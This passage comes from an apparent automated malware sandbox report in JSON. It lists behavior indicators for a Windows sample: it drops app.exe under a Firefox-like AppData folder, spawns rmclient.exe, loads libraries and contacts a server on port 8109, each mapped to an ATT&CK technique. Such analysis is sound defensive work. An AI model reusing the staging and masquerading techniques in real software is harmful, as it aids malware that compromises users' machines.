\"12001300e448246c@ADVAPI32.dll\"\n \"14001500f86e246c@ADVAPI32.dll\"\n \"14001500106f246c@ADVAPI32.dll\"\n \"14001500286f246c@ADVAPI32.dll\"\n \"17001800406f246c@ADVAPI32.dll\"\n \"0d000e00586f246c@ADVAPI32.dll\"\n \"11001200686f246c@ADVAPI32.dll\"\n \"110012007c6f246c@ADVAPI32.dll\"\n \"0d000e004466246c@WININET.dll\"\n \"0d000e00b466246c@WININET.dll\"\n \"10001100ec66246c@WININET.dll\"\n \"100011009067246c@WININET.dll\"\n \"10001100c06f246c@WININET.dll\"\n \"10001100d46f246c@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter CSCAPI.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\shell32.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\MICROS~3\\Office14\\GROOVEEX.DLL (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\office.odf (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter srvcli.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter cscapi.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter slc.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter SETUPAPI.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter DEVRTL.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter imageres.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"LoadLibrary\" with a parameter netutils.dll (UID: 00000000-00004436)\n \"app.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002452)\n \"app.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002452)\n \"app.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002452)\n \"app.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002452)\n \"app.exe\" called \"LoadLibrary\" with a parameter Iphlpapi (UID: 00000000-00002452)\n \"app.exe\" called \"LoadLibrary\" with a parameter Advapi32.dll (UID: 00000000-00002452)\n \"app.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002452)\n \"app.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00002452)\n \"app.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00002452)\n \"app.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00002452)\n \"app.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002452)\n \"app.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002452)\n \"app.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter CSCAPI.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\shell32.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\MICROS~3\\Office14\\GROOVEEX.DLL (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\office.odf (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter srvcli.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter cscapi.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter slc.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter SETUPAPI.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter DEVRTL.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter imageres.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter netutils.dll (UID: 00000000-00004636)\n \"app.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter Shell32 (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter Shlwapi (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter Iphlpapi (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter Advapi32.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter CSCAPI.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\shell32.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\MICROS~3\\Office14\\GROOVEEX.DLL (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\office.odf (UID: 00000000-00003064)\n \"app.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter Shell32 (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter Shlwapi (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter Iphlpapi (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter Advapi32.dll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter CSCAPI.dll (UID: 00000000-00004980)\n \"app.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004696)\n \"app.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004696)\n \"app.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004696)\n \"app.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004696)\n \"app.exe\" called \"LoadLibrary\" with a parameter Iphlpapi (UID: 00000000-00004696)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004436)\n \"app.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\firefox tsms (UID: 00000000-00002452)\n \"app.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\firefox mssd (UID: 00000000-00002452)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"CreateProcessW\" with parameter \"\"%APPDATA%\\firefox tsms\\app.exe\"\" - (UID: 00000000-00004436)\n \"app.exe\" called \"CreateProcessW\" with parameter \"rmclient.exe\" - (UID: 00000000-00002452)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 776F0000\n \"app.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 776F0000\n \"rmclient.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 776F0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"app.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645\" file has an entrypoint instructions - \"call\t0x43528d,jmp\t0x434be8,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\t0x17,call\t0x4570c9,test\teax, eax,je\t0x434d88,mov\tecx, dword ptr [ebp + 8],int\t0x29,push\t3,call\t0x434f4e,mov\tdword ptr [esp], 0x2cc,lea\teax, [ebp - 0x324],push\t0,push\teax,call\t0x437280,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"\n \"app.exe\" file has an entrypoint instructions - \"call\t0x43528d,jmp\t0x434be8,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\t0x17,call\t0x4570c9,test\teax, eax,je\t0x434d88,mov\tecx, dword ptr [ebp + 8],int\t0x29,push\t3,call\t0x434f4e,mov\tdword ptr [esp], 0x2cc,lea\teax, [ebp - 0x324],push\t0,push\teax,call\t0x437280,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"app.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"app.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:8109\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645\" has an executable section named \".text\"\n \"app.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645\" has an writable section named \".data\"\n \"app.exe\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"app.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"app.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"app.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"app.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"app.exe\" (UID: 00000000-00002452)\n Spawned process \"rmclient.exe\" (UID: 00000000-00004688)\n Spawned process \"app.exe\" (UID: 00000000-00004636)\n Spawned process \"app.exe\" (UID: 00000000-00003064)\n Spawned process \"app.exe\" (UID: 00000000-00004980)\n Spawned process \"app.exe\" (UID: 00000000-00004696)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"app.exe\" (UID: 00000000-00002452)\n Spawned process \"rmclient.exe\" (UID: 00000000-00004688)\n Spawned process \"app.exe\" (UID: 00000000-00004636)\n Spawned process \"app.exe\" (UID: 00000000-00003064)\n Spawned process \"app.exe\" (UID: 00000000-00004980)\n Spawned process \"app.exe\" (UID: 00000000-00004696)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"app.exe\" (UID: 00000000-00002452) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"app.exe\" (UID: 00000000-00002452) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"app.exe\" (UID: 00000000-00004636) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"app.exe\" (UID: 00000000-00004636) was launched with modified environment variables: \"PSModulePath, PATHEXT, NUMBER_OF_PROCESSORS\"\n Process \"app.exe\" (UID: 00000000-00004636) was launched with missing environment variables: \"USERDNSDOMAIN\"\n Process \"app.exe\" (UID: 00000000-00003064) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"app.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"app.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"app.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645\" was detected as \"VC8 -> Microsoft Corporation\"\n \"app.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"app.exe\" - Location: [%APPDATA%\\firefox tsms\\app.exe]- [targetUID: 00000000-00004436]\n Dropped file: \"cfg.dat\" - Location: [%APPDATA%\\firefox mssd\\cfg.dat]- [targetUID: 00000000-00002452]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"app.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"c:\\fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\"\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n 